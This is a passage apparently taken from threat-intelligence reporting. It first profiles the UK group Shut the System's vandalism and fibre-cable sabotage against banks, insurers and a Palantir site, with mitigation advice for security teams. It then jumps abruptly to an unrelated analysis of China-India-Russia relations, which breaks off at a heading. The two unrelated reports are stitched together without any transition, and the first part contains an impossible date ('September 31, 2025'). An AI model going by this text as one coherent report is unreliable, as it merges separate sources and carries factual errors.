The first reported Shut the System operation took place in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 communiqué, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 article from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action conducted a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.
Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with almost certain Palestine Action offshoot groups. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:
On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.
On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”
On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company responsible for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.
From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber optics lines. Instructions on Shut the System’s website demonstrate how to identify fiber optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.
Mitigations
The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&W) of planned activities.
To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.
Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.
Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.
Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.
Review and, where necessary, implement governmental guidelines for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.
Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.
Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.
Outlook
While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.
Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.
Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.
Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.
United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.
The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).
However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.
Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.
Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.
Key Findings
The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.
However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.
The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.
An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.
Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.
Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia
We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.
India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– necessitateslooking for alternative markets and deepening foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including cultivating its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs called the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically highlighted the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s increasing oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly monitoring the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely repair, the deteriorating diplomatic and economic ties between India and the US.
The US tariffs have likely also reinforced an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.
Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi stated that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin (Figure 1) at the SCO Summit sparked concerns over an emergent Russia-India-China troika.
Figure 1:Photo posted by Modi of himself with Putin and Xi at the SCO Summit
on August 31, 2025 (Source: Social Media)
The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.
Areas of Bilateral Intersection and Divergence Among China, India, and Russia
Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.
China’s Foreign Policy
China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” such aspreserving the CCP’s political power, territorial integrity, and economic development, as well as China’s efforts to shape a “multipolar” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main perceivedthreat — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely considers India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.
India’s Foreign Policy
India almost certainly defines its relationships with China and Russia through its doctrine of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in founding the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic balancingact seeking to promote an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also underpinned by a “multi-alignment” policy, which very likely seeks to promote and safeguard India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has cultivated its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.
Russia’s Foreign Policy
Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:
Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most sanctioned state in the world.
China-Russia: Strategic Partners in Countering the West
In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.
Political Dynamics
Chinese and Russian leadership almost certainly see each other as primary strategic partners in advancing the “multipolar” world. In 2023, Xi said to Putin, “We are the ones driving” changes unseen in a century, and multiple jointstatements have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the Global Governance Initiative, Global Security Initiative, and Global Development Initiative.
Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have met over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia declared a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.
Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has decreased by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade disruptions and sanctions (1, 2, 3). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, prefers a protracted conflict in Ukraine as it diverts the US’s focus away from China.
At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document prepared by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.
Economic Dynamics
Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade denominated in Chinese yuan.
China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially increased. On September 2, 2025, Russia and China signed a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China buys Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly cancelled orders of Russian oil imports following US sanctions in late October 2025.
In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of dual-use and military-relevantgoods and expertise. As of mid-2025, dual-use exports to Russia likely have at least slightly decreased from their peak in 2024.
Overall trade between China and Russia has also grown significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly double that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border crossings –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also expanding, and China and Russia have announced deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).
There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to avoid overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began halting transactions with Russian customers, and at least one bank did so as recently as September 2025 after being sanctioned by the EU. In September 2024, China implemented a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.
Military Dynamics
Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more frequent and more complex, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to participate in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise involved a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber flight into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia conducted their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.
In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he stated that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further indicates that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”
Beyond military exercises, US officials have asserted as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government asserts that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is providing Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US sanctioned a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were working on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been involved in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.
Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.
Cooperation in Propaganda and Influence Operations
We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, including media forums, journalist exchanges activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement stating that they would “jointly articulate a common stance in the global media space.”
China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) shows that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) spread narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely used a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.
Since approximately 2019, China has increasingly used computational propaganda and influence operation tactics likely learned by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently frame the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta banned Russian state media outlets from purchasing ads on its platforms, China Global TV Network placed at least 21 pro-Russia advertisements on Facebook in a single month.
China-India: Nascent Thaw of Longtime Tension-Filled Relationship
China-India relations have gone through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.
In recent months, China-India relations have likely returned to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely driven India to pursue improved ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” challenging years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, noted that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent rapprochement, significant hurdles and unresolved disagreements remain, making it less likely that China and India will form a long-term strategic partnership.
Political Dynamics
China’s approach to India is likely primarily driven by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to consolidate control over disputed border territories, leading to deadly skirmishes with India and cyberattacksagainst Indian critical infrastructure. India’s approach to China has likely been rooted in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.
Over the last year, China and India’s relations have thawed significantly, especially compared to 2020, when the China-India border dispute escalated. In 2024, China and India concluded an agreement that returned the border to its pre-2020 status, thereby completing a disengagement process and reopening border trade. India and China began re-engaging in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India resumed direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar emphasized the importance of continued cooperation between the two countries.
Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have endorsed the idea of a multipolar world, but Modi has emphasized the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely seeks to balance asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only supported inter-BRICS trade based on local currency.
Economic Dynamics
We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India issued Press Note 3, which limited Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly rejected a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.
Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily dependent on Chinese supply chains, which very likely gives Beijing some economic leverage over India.
India faces a significant and growing trade deficit with China — reaching $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China remains India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.
India has taken actions to reduce its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has bolsteredinvestment in domestic production and implemented protectionist policies, such as the “Make in India” policy, the Production-Linked Incentive (PLI) scheme, and, most recently, the “National Manufacturing Mission.” Threatening China’s economic and technological interests, India banned hundreds of Chinese-developed mobile applications and has pursuedefforts with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to impede Apple from moving its supply chain for US phones from China to India.
Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India views the region as its primary sphere of influence. The policy, considered a “defining subset of its overall foreign policy,” hinges on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly opposes China’s Belt and Road Initiative (BRI) because New Delhi views China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and counter India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project linking China and Pakistan through roads, railways, and pipelines — which India almost certainly perceived as the most immediate threat to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to facilitate Chinese energy imports while strengthening Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major concern for India.
Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion more in 2021 than in 2018. The total value of foreign direct investment from China into India also returned to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China launched the AIIB in 2016, and the bank has dozens of approved projects in India.
Military Dynamics
We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.
India and China share a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic dispute. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry devolved into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension followed, during which each side built up troops in the contested areas. After at least 21 rounds of Senior Highest Military Commander Level (Corps Commander) talks and other efforts, India and China signed an agreement in 2024, which led to the disengagement of troops. Even with border tensions currently defused, the overarching territorial dispute very likely persists as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.
In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active throughout the IOR, often as part of air, land, and sea-based multilateral exercises but also to support the PLA Navy’s “Far Seas Protection” strategy. In addition to military exercises, the PLA makes use of commercial ports in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely perceives China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes referred to as a “string of pearls” strategy by analysts outside of China — as an encirclement of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India competed to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately called at the port over New Delhi’s objections. In 2023, India objected to the presence of a Chinese state-owned research vessel, which China very likely uses to support PLA requirements. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to build out relevant infrastructure along disputed border areas.
Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual exercise with the US took place just 62 miles from a disputed border area. In 2024, India organized the first Tarang Shak air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines conducted a joint naval drill in the South China Sea. India almost certainly views China’s military cooperation and integration with Pakistan –– including China’s role as Islamabad’s main supply of arms –– as a grave threat to Indian security. China is responsible for 81% of Pakistan’s arms imports.
India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade
India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and 2024, India and Russia defined their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin issued a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”
Political Dynamics
